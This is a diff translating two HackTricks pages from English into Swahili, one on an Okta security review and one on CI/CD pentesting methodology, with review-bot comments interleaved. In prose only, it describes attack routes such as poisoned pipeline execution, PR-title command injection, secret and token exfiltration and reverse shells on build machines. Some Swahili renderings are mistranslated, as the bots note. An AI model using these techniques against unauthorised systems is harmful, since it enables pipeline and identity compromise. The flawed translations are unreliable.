-Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+Zaidi ya hayo, katika tab ya **Setting**, ikiwa wewe ni admin, unaweza "**Tumia ukurasa maalum wa kutoka**" na kuweka URL maalum.
### SMS
-Nothing interesting here.
+Hakuna kitu cha kuvutia hapa.
### End-User Dashboard
-You can find here applications configured, but we will see the details of those later in a different section.
+Unaweza kupata hapa programu zilizowekwa, lakini tutaona maelezo ya hizo baadaye katika sehemu tofauti.
### Other
-Interesting setting, but nothing super interesting from a security point of view.
+Mipangilio ya kuvutia, lakini hakuna kitu cha kuvutia sana kutoka kwa mtazamo wa usalama.
## Applications
### Applications
-Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+Hapa unaweza kupata **programu zote zilizowekwa** na maelezo yao: Nani ana ufikiaji wa hizo, jinsi ilivyowekwa (SAML, OPenID), URL ya kuingia, ramani kati ya Okta na programu...
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+Katika tab ya **`Sign On`** pia kuna uwanja unaoitwa **`Password reveal`** ambao utamruhusu mtumiaji **kuonyesha nenosiri lake** wakati wa kuangalia mipangilio ya programu. Ili kuangalia mipangilio ya programu kutoka kwa Paneli ya Mtumiaji, bonyeza alama 3:
-And you could see some more details about the app (like the password reveal feature, if it's enabled):
+Na unaweza kuona maelezo zaidi kuhusu programu (kama kipengele cha kuonyesha nenosiri, ikiwa kimewezeshwa):
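Review bot: the Okta admin-console labels this section tells the reader to look for are translated rather than kept verbatim ("Hatua ya mtumiaji inayosubiri" / "Kurekebisha nenosiri" for **Pending user action** / **Password reset**, "Wasimamizi wa Kimataifa" for **Global Administrators**), so a reviewer cannot match them against the UI; keep quoted labels and group names in English, as the same hunk already does for `User (default)`, `Sign On` and `Password reveal`. Two meaning slips in the same hunk: "Maktaba" (library) for Directories under **Directory Integrations**, where the AD/LDAP sense needs "saraka" or the untranslated term, and "inasimamiwa kwa ufanisi" (managed efficiently) for "actively managed" under **Devices**, where the point is whether the device is under management at all.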
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat
### Access Certifications
-Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+Tumia Access Certifications kuunda kampeni za ukaguzi ili kupitia ufikiaji wa watumiaji wako kwa rasilimali mara kwa mara na kuidhinisha au kufuta ufikiaji kiotomatiki inapohitajika.
-I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+Sijawahi kuona ikitumika, lakini nadhani kutoka kwa mtazamo wa kujihami ni kipengele kizuri.
## Security
### General
-- **Security notification emails**: All should be enabled.
-- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-- **User enumeration prevention**: Both should be enabled
- - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- - Self-Service Registration
- - JIT flows with email authentication
-- **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **Barua pepe za arifa za usalama**: Zote zinapaswa kuwezeshwa.
+- **Ushirikiano wa CAPTCHA**: Inapendekezwa kuweka angalau reCaptcha isiyoonekana
+- **Usalama wa Shirika**: Kila kitu kinaweza kuwezeshwa na barua pepe za uanzishaji hazipaswi kudumu kwa muda mrefu (siku 7 ni sawa)
+- **Kuzuia kuhesabu watumiaji**: Zote zinapaswa kuwezeshwa
+- Kumbuka kuwa Kuzuia Kuangalia Watumiaji hakutatumika ikiwa mojawapo ya masharti yafuatayo yanaruhusiwa (Tazama [Usimamizi wa watumiaji](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) kwa maelezo zaidi):
+- Usajili wa Huduma ya Kibinafsi
+- Mchakato wa JIT na uthibitisho wa barua pepe
+- **Mipangilio ya Okta ThreatInsight**: Rekodi na enforce usalama kulingana na kiwango cha tishio
### HealthInsight
-Here is possible to find correctly and **dangerous** configured **settings**.
+Hapa inawezekana kupata mipangilio **iliyowekwa** kwa usahihi na **hatari**.
### Authenticators
-Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+Hapa unaweza kupata njia zote za uthibitishaji ambazo mtumiaji anaweza kutumia: Nenosiri, simu, barua pepe, nambari, WebAuthn... Bonyeza kwenye uthibitishaji wa Nenosiri unaweza kuona **sera ya nenosiri**. Hakikisha kuwa ni imara.
-In the **Enrollment** tab you can see how the ones that are required or optinal:
+Katika tab ya **Enrollment** unaweza kuona jinsi zile zinazohitajika au za hiari:
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+Inapendekezwa kuzima Simu. Njia zenye nguvu zaidi ni pengine mchanganyiko wa nenosiri, barua pepe na WebAuthn.
### Authentication policies
-Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+Kila programu ina sera ya uthibitishaji. Sera ya uthibitishaji inathibitisha kuwa watumiaji wanaojaribu kuingia kwenye programu wanakidhi masharti maalum, na inatekeleza mahitaji ya vipengele kulingana na masharti hayo.
-Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+Hapa unaweza kupata **mahitaji ya kufikia kila programu**. Inapendekezwa kutaka angalau nenosiri na njia nyingine kwa kila programu. Lakini ikiwa kama mshambuliaji unapata kitu chochote dhaifu unaweza kuwa na uwezo wa kukishambulia.
### Global Session Policy
-Here you can find the session policies assigned to different groups. For example:
+Hapa unaweza kupata sera za kikao zilizotengwa kwa makundi tofauti. Kwa mfano:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+Inapendekezwa kutaka MFA, kupunguza muda wa kikao kuwa masaa kadhaa, usihifadhi kuki za kikao kupitia nyongeza za kivinjari na kupunguza eneo na Mtoa Kitambulisho (ikiwa hii inawezekana). Kwa mfano, ikiwa kila mtumiaji anapaswa kuingia kutoka nchi fulani unaweza kuruhusu tu eneo hili.
### Identity Providers
-Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+Watoa Kitambulisho (IdPs) ni huduma ambazo **zinatawala akaunti za watumiaji**. Kuongeza IdPs katika Okta kunawawezesha watumiaji wako wa mwisho **kujiandikisha wenyewe** na programu zako maalum kwa kuanza kuthibitisha na akaunti ya kijamii au kadi ya smart.
-On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+Katika ukurasa wa Watoa Kitambulisho, unaweza kuongeza kuingia kwa kijamii (IdPs) na kuunda Okta kama mtoa huduma (SP) kwa kuongeza SAML ya ndani. Baada ya kuongeza IdPs, unaweza kuunda sheria za kuelekeza watumiaji kwa IdP kulingana na muktadha, kama vile eneo la mtumiaji, kifaa, au kikoa cha barua pepe.
-**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+**Ikiwa mtoa kitambulisho yeyote amewekwa** kutoka kwa mtazamo wa washambuliaji na walinzi angalia mipangilio hiyo na **ikiwa chanzo ni cha kuaminika kweli** kwani mshambuliaji anayevunja inaweza pia kupata ufikiaji wa mazingira ya Okta.
### Delegated Authentication
-Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+Uthibitishaji wa wakala unaruhusu watumiaji kuingia katika Okta kwa kuingiza taarifa za kuingia za **Active Directory (AD) au LDAP** ya shirika lao.
-Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+Tena, angalia hii, kwani mshambuliaji anayevunja AD ya shirika anaweza kuwa na uwezo wa kuhamasisha Okta kutokana na mipangilio hii.
### Network
-A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+Eneo la mtandao ni mpaka unaoweza kubadilishwa ambao unaweza kutumia ili **kutoa au kupunguza ufikiaji wa kompyuta na vifaa** katika shirika lako kulingana na **anwani ya IP** inayotafuta ufikiaji. Unaweza kufafanua eneo la mtandao kwa kubainisha moja au zaidi ya anwani za IP, anuwai za anwani za IP, au maeneo ya kijiografia.
-After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+Baada ya kufafanua moja au zaidi ya maeneo ya mtandao, unaweza **kuvitumia katika Sera za Kikao za Kimataifa**, **sera za uthibitishaji**, arifa za VPN, na **sheria za kuelekeza**.
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+Kutoka kwa mtazamo wa washambuliaji ni ya kuvutia kujua ni IP zipi zinazoruhusiwa (na kuangalia ikiwa kuna **IPs zenye mamlaka zaidi** kuliko nyingine). Kutoka kwa mtazamo wa washambuliaji, ikiwa watumiaji wanapaswa kufikia kutoka anwani maalum ya IP au eneo angalia kuwa kipengele hiki kinatumika ipasavyo.
### Device Integrations
-- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- - I haven't seen this used yet. TODO
-- **Notification services**: I haven't seen this used yet. TODO
+- **Usimamizi wa Kituo**: Usimamizi wa kituo ni hali ambayo inaweza kutumika katika sera ya uthibitishaji ili kuhakikisha kuwa vifaa vilivyo na usimamizi vina ufikiaji wa programu.
+- Sijawahi kuona hii ikitumika bado. TODO
+- **Huduma za Arifa**: Sijawahi kuona hii ikitumika bado. TODO
### API
-You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+Unaweza kuunda token za API za Okta katika ukurasa huu, na kuona zile ambazo zime **undwa**, **mamlaka** zao, muda wa **kuisha** na **URLs za Chanzo**. Kumbuka kuwa token za API zinaundwa kwa ruhusa za mtumiaji aliyekuwa ameunda token hiyo na ni halali tu ikiwa **mtumiaji** aliyekuwa ameunda ni **hai**.
-The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+**Vyanzo vya Kuaminika** vinatoa ufikiaji kwa tovuti ambazo unadhibiti na kuamini ili kufikia shirika lako la Okta kupitia API ya Okta.
-There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+Hakupaswi kuwa na token nyingi za API, kwani ikiwa kuna mshambuliaji anaweza kujaribu kuzipata na kuzitumia.
## Workflow
### Automations
-Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+Automations zinakuwezesha kuunda vitendo vya kiotomatiki vinavyofanyika kulingana na seti ya masharti ya kichocheo yanayotokea wakati wa mzunguko wa maisha wa watumiaji wa mwisho.
-For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+Kwa mfano, hali inaweza kuwa "Kutokuwepo kwa mtumiaji katika Okta" au "Kuisha kwa nenosiri la mtumiaji katika Okta" na kitendo kinaweza kuwa "Tuma barua pepe kwa mtumiaji" au "Badilisha hali ya maisha ya mtumiaji katika Okta".
## Reports
### Reports
-Download logs. They are **sent** to the **email address** of the current account.
+Pakua kumbukumbu. Zinatumwa kwa **anwani ya barua pepe** ya akaunti ya sasa.
### System Log
-Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+Hapa unaweza kupata **kumbukumbu za vitendo vilivyofanywa na watumiaji** kwa maelezo mengi kama kuingia katika Okta au katika programu kupitia Okta.
### Import Monitoring
-This can **import logs from the other platforms** accessed with Okta.
+Hii inaweza **kuingiza kumbukumbu kutoka kwa majukwaa mengine** yaliyofikiwa na Okta.
### Rate limits
-Check the API rate limits reached.
+Angalia mipaka ya kiwango cha API iliyofikiwa.
## Settings
### Account
-Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+Hapa unaweza kupata **taarifa za jumla** kuhusu mazingira ya Okta, kama vile jina la kampuni, anwani, **mwanakandarasi wa bili ya barua pepe**, **mwanakandarasi wa kiufundi wa barua pepe** na pia ni nani anapaswa kupokea masasisho ya Okta na ni aina gani ya masasisho ya Okta.
### Downloads
-Here you can download Okta agents to sync Okta with other technologies.
+Hapa unaweza kupakua wakala wa Okta ili kuunganisha Okta na teknolojia nyingine.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
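Review bot: "User Enumeration Prevention" is translated two different ways on consecutive lines ("Kuzuia kuhesabu watumiaji" in the bullet, "Kuzuia Kuangalia Watumiaji" in its note), and the nested bullets under it (the "Note that ..." line and the **Self-Service Registration** / **JIT flows with email authentication** conditions) lose their indentation on the `+` side, so the two conditions now render as top-level settings alongside ThreatInsight; the same flattening happens to the "I haven't seen this used yet. TODO" sub-bullet under **Endpoint Management**. Pick one term and restore the indents. Also, under **Settings > Account**, "mwanakandarasi" means contractor, not contact ("email billing contact" should be something like "anwani ya barua pepe ya mawasiliano ya bili"), and under **Delegated Authentication** "kuhamasisha Okta" (motivate Okta) does not carry "pivot to Okta". The "across browser extensions" wording in the **Global Session Policy** source line is copied as "nyongeza za kivinjari"; the Okta setting is about persisting session cookies across browser sessions, so this is likely a slip in the original worth fixing while translating.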
diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 41899af04..ac7b2c8e0 100644
--- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -6,103 +6,99 @@
## VCS
-VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+VCS inamaanisha **Mfumo wa Kudhibiti Toleo**, mifumo hii inaruhusu waendelezaji **kusimamia msimbo wao wa chanzo**. Mmoja wa kawaida ni **git** na kawaida utaona kampuni zikilitumia katika moja ya **majukwaa** yafuatayo:
- Github
- Gitlab
- Bitbucket
- Gitea
-- Cloud providers (they offer their own VCS platforms)
+- Watoa huduma wa wingu (wanatoa majukwaa yao ya VCS)
## CI/CD Pipelines
-CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+Pipelines za CI/CD zinawawezesha waendelezaji **kujiandaa kutekeleza msimbo** kwa madhumuni mbalimbali, ikiwa ni pamoja na kujenga, kujaribu, na kupeleka programu. Mifumo hii ya kiotomatiki **inasababishwa na vitendo maalum**, kama vile kusukuma msimbo, maombi ya kuvuta, au kazi zilizopangwa. Zinasaidia katika kuboresha mchakato kutoka kwa maendeleo hadi uzalishaji.
-However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+Hata hivyo, mifumo hii inahitaji **kutekelezwa mahali fulani** na kawaida kwa **akidi za kibali ili kupeleka msimbo au kufikia taarifa nyeti**.
## VCS Pentesting Methodology
> [!NOTE]
-> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
+> Hata kama baadhi ya majukwaa ya VCS yanaruhusu kuunda pipelines kwa sehemu hii tutachambua tu mashambulizi yanayoweza kutokea kwenye udhibiti wa msimbo wa chanzo.
-Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+Majukwaa yanayoshikilia msimbo wa mradi wako yana taarifa nyeti na watu wanahitaji kuwa makini sana na ruhusa zinazotolewa ndani ya jukwaa hili. Haya ni baadhi ya matatizo ya kawaida katika majukwaa ya VCS ambayo mshambuliaji anaweza kuyatumia:
-- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
- - **Register**: Some platforms will just allow external users to create an account.
- - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
- - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
- - If no secret is in place, the attacker could abuse the webhook of the third party platform
- - If the secret is in the URL, the same happens and the attacker also have the secret
-- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
- - Compromise the main branch to **compromise production**.
- - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
- - **Compromise the pipeline** (check next section)
+- **Leaks**: Ikiwa msimbo wako una leaks katika commits na mshambuliaji anaweza kufikia repo (kwa sababu ni ya umma au kwa sababu ana ufikiaji), anaweza kugundua leaks.
+- **Access**: Ikiwa mshambuliaji anaweza **kufikia akaunti ndani ya jukwaa la VCS** anaweza kupata **nadharia zaidi na ruhusa**.
+- **Register**: Baadhi ya majukwaa yataruhusu tu watumiaji wa nje kuunda akaunti.
+- **SSO**: Baadhi ya majukwaa hayataruhusu watumiaji kujiandikisha, lakini yataruhusu mtu yeyote kufikia kwa SSO halali (hivyo mshambuliaji anaweza kutumia akaunti yake ya github kuingia kwa mfano).
+- **Credentials**: Jina la mtumiaji + Pwd, alama za kibinafsi, funguo za ssh, alama za Oauth, cookies... kuna aina kadhaa za alama ambazo mtumiaji anaweza kuiba ili kufikia kwa njia fulani repo.
+- **Webhooks**: Majukwaa ya VCS yanaruhusu kuunda webhooks. Ikiwa hazijalindwa na siri zisizoonekana, **mshambuliaji anaweza kuzitumia vibaya**.
+- Ikiwa hakuna siri iliyowekwa, mshambuliaji anaweza kuzitumia vibaya webhook ya jukwaa la tatu
+- Ikiwa siri iko katika URL, jambo hilo linaweza kutokea na mshambuliaji pia ana siri hiyo
+- **Code compromise:** Ikiwa mhusika mbaya ana aina fulani ya **kuandika** ufikiaji juu ya repos, anaweza kujaribu **kuiingiza msimbo mbaya**. Ili kufanikiwa anaweza kuhitaji **kuzidi ulinzi wa tawi**. Vitendo hivi vinaweza kufanywa kwa malengo tofauti akilini:
+- Kuathiri tawi kuu ili **kuathiri uzalishaji**.
+- Kuathiri tawi kuu (au matawi mengine) ili **kuathiri mashine za waendelezaji** (kama kawaida wanatekeleza majaribio, terraform au mambo mengine ndani ya repo kwenye mashine zao).
+- **Kuathiri pipeline** (angalia sehemu inayofuata)
## Pipelines Pentesting Methodology
-The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
-These files typically have a consistent name and format, for example ā Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+Njia ya kawaida zaidi ya kufafanua pipeline, ni kwa kutumia **faili ya usanidi wa CI iliyohifadhiwa katika hazina** ambayo pipeline inajenga. Faili hii inaelezea mpangilio wa kazi zinazotekelezwa, masharti yanayoathiri mtiririko, na mipangilio ya mazingira ya kujenga.\
+Faili hizi kwa kawaida zina jina na muundo wa kawaida, kwa mfano ā Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), na faili za YAML za GitHub Actions zilizo chini ya .github/workflows. Wakati inasababishwa, kazi ya pipeline **inasukuma msimbo** kutoka chanzo kilichochaguliwa (k.m. commit / branch), na **inaendesha amri zilizotajwa katika faili ya usanidi wa CI** dhidi ya msimbo huo.
-Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+Kwa hivyo lengo kuu la mshambuliaji ni kwa namna fulani **kuathiri faili hizo za usanidi** au **amri wanazotekeleza**.
### PPE - Poisoned Pipeline Execution
-The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+Njia ya Poisoned Pipeline Execution (PPE) inatumia ruhusa katika hazina ya SCM ili manipulative pipeline ya CI na kutekeleza amri hatari. Watumiaji wenye ruhusa zinazohitajika wanaweza kubadilisha faili za usanidi wa CI au faili nyingine zinazotumiwa na kazi ya pipeline ili kujumuisha amri mbaya. Hii "ina sumu" pipeline ya CI, ikisababisha kutekelezwa kwa amri hizi mbaya.
-For a malicious actor to be successful performing a PPE attack he needs to be able to:
+Ili mhusika mbaya afanikiwe kufanya shambulio la PPE anahitaji kuwa na uwezo wa:
-- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
- - Note that sometimes an **external PR count as "write access"**.
-- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
- - For this, he might need to be able to **bypass branch protections**.
+- Kuwa na **ufikiaji wa kuandika kwenye jukwaa la VCS**, kwani kawaida pipelines husababishwa wakati kusukuma au ombi la kuvuta linafanywa. (Angalia mbinu za pentesting za VCS kwa muhtasari wa njia za kupata ufikiaji).
+- Kumbuka kwamba wakati mwingine **PR ya nje inachukuliwa kama "ufikiaji wa kuandika"**.
+- Hata kama ana ruhusa za kuandika, anahitaji kuwa na uhakika anaweza **kubadilisha faili ya usanidi wa CI au faili nyingine ambazo usanidi unategemea**.
+- Kwa hili, anaweza kuhitaji kuwa na uwezo wa **kuzidi ulinzi wa tawi**.
-There are 3 PPE flavours:
+Kuna ladha 3 za PPE:
-- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
- - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**: Shambulio la **Direct PPE** linatokea wakati mhusika **anabadilisha faili ya usanidi wa CI** ambayo itatekelezwa.
+- **I-DDE**: Shambulio la **Indirect PPE** linatokea wakati mhusika **anabadilisha** **faili** ambayo faili ya usanidi wa CI ambayo itatekelezwa **inategemea** (kama faili ya kutengeneza au usanidi wa terraform).
+- **Public PPE au 3PE**: Katika baadhi ya matukio pipelines zinaweza **kusababishwa na watumiaji ambao hawana ufikiaji wa kuandika katika repo** (na ambao huenda hata si sehemu ya shirika) kwa sababu wanaweza kutuma PR.
+- **3PE Command Injection**: Kawaida, pipelines za CI/CD zitakuwa **kuziseti mazingira ya mabadiliko** na **taarifa kuhusu PR**. Ikiwa thamani hiyo inaweza kudhibitiwa na mshambuliaji (kama kichwa cha PR) na inatumika katika **mahali hatari** (kama kutekeleza **amri za sh**), mshambuliaji anaweza **kuingiza amri hapo**.
### Exploitation Benefits
-Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+Kujua ladha 3 za kuathiri pipeline, hebu tuangalie ni nini mshambuliaji anaweza kupata baada ya uhalifu wa mafanikio:
-- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
- - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
- - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
- - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
- - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
- - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **Secrets**: Kama ilivyotajwa hapo awali, pipelines zinahitaji **privileges** kwa kazi zao (kurejesha msimbo, kuujenga, kupeleka...) na ruhusa hizi kwa kawaida **zinatolewa katika siri**. Siri hizi kwa kawaida zinapatikana kupitia **mabadiliko ya mazingira au faili ndani ya mfumo**. Kwa hivyo mshambuliaji daima atajaribu kuhamasisha siri nyingi kadri iwezekanavyo.
+- Kulingana na jukwaa la pipeline mshambuliaji **anaweza kuhitaji kutaja siri katika usanidi**. Hii inamaanisha kwamba ikiwa mshambuliaji cannot kubadilisha usanidi wa pipeline ya CI (**I-PPE** kwa mfano), anaweza **tu kuhamasisha siri ambazo pipeline hiyo ina**.
+- **Computation**: Msimbo unatekelezwa mahali fulani, kulingana na mahali unatekelezwa mshambuliaji anaweza kuwa na uwezo wa pivot zaidi.
+- **On-Premises**: Ikiwa pipelines zinafanywa kwenye premises, mshambuliaji anaweza kumaliza katika **mtandao wa ndani wenye ufikiaji wa rasilimali zaidi**.
+- **Cloud**: Mshambuliaji anaweza kufikia **mashine nyingine katika wingu** lakini pia anaweza **kuhamasisha** alama za IAM/akaunti za huduma **tokens** kutoka kwake ili kupata **ufikiaji zaidi ndani ya wingu**.
+- **Platforms machine**: Wakati mwingine kazi zitatekelezwa ndani ya **mashine za jukwaa la pipelines**, ambazo kawaida ziko ndani ya wingu bila **ufikiaji zaidi**.
+- **Select it:** Wakati mwingine **jukwaa la pipelines litakuwa limepanga mashine kadhaa** na ikiwa unaweza **kubadilisha faili ya usanidi wa CI** unaweza **kuonyesha wapi unataka kutekeleza msimbo mbaya**. Katika hali hii, mshambuliaji labda atatekeleza shell ya kurudi kwenye kila mashine inayowezekana kujaribu kuifanyia kazi zaidi.
+- **Compromise production**: Ikiwa uko ndani ya pipeline na toleo la mwisho linajengwa na kupelekwa kutoka kwake, unaweza **kuathiri msimbo ambao utaishia kutekelezwa katika uzalishaji**.
## More relevant info
### Tools & CIS Benchmark
-- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) ni zana ya chanzo wazi kwa ajili ya kukagua mnyororo wa usambazaji wa programu yako kwa ajili ya kufuata usalama kulingana na [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Ukaguzi unalenga mchakato mzima wa SDLC, ambapo unaweza kufichua hatari kutoka wakati wa msimbo hadi wakati wa kupeleka.
### Top 10 CI/CD Security Risk
-Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+Angalia makala hii ya kuvutia kuhusu hatari 10 bora za CI/CD kulingana na Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
-- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
+- Kwenye kila jukwaa ambalo unaweza kukimbia kwa ndani utapata jinsi ya kulizindua ndani ili uweze kulipanga kama unavyotaka kulijaribu
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
-- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** ni zana ya uchambuzi wa msimbo wa statiki kwa ajili ya miundombinu kama msimbo.
## References
- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
